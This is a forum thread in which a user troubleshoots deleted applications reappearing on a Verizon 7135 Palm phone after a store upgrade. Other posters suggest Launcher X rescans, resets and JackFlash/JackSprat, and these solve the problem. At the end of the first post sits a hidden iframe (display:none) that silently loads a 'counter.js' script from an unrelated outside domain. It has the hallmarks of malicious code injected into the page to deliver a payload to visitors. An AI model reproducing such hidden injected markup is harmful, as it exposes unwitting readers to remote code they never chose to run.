+ Reply to Thread

Thread: Very Strange

Very Strange

I upgraded my 7135 today at the Verizon store. Well when i got it back, everything that i put on there was deleted (thanks for backup buddy). And everything that i had deleted using JackFlash and JackSprat, was now back on there (photosuite, eudora web and mail, and some other stuff). So i did a restore using BB and all my stuff was now back. But here comes the problem. All the stuff i deleted was gone. Now, I have Launcher X, so what i was looking at was the regular face, so i switch to launcher X and there they are, all the items i deleted. But when i switch back, they arent there. I go to DELETE, and none of the things show up. So i go back to the regular face and they are there too. But the funny thing is, i still have the same amount of memory left that i had before i took the phone in. So my point is, are these icons just appearing on my phone and not taking up any space? I searched info and all the things that are supposed to be gone, take up a memory of 1k. Is there anyway that i can get this off? Im thinking i have to use JackFlash and Jack Sprat all over again.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Did you have launcher x rescan to get the current list of programs? You may want to delete and reinstall launcher x...

Originally posted by hulsmsc
    Did you have launcher x rescan to get the current list of programs? You may want to delete and reinstall launcher x...
    Yes i did a rescan. But uninstalling Launcher X wont make those applications go away because they show up on the regular face as well. I did a soft reset as well. they show up in "INFO" but they dont show up in "DELETE". When i try to move one them to the trash from launcher X, i get a message saying "Application (or database) cannont be deleted, probably in rom,". I will try using JackFlash and JackSprat when i get home.

you may want to do a hard reset and just reinstall all your apps manually

Did you try to delete from the palm (ROM) lancher? if not Jack sprat/ flash should remove them

Ok, JackFlash and JackSprat got rid of it for me. Thanks for the help.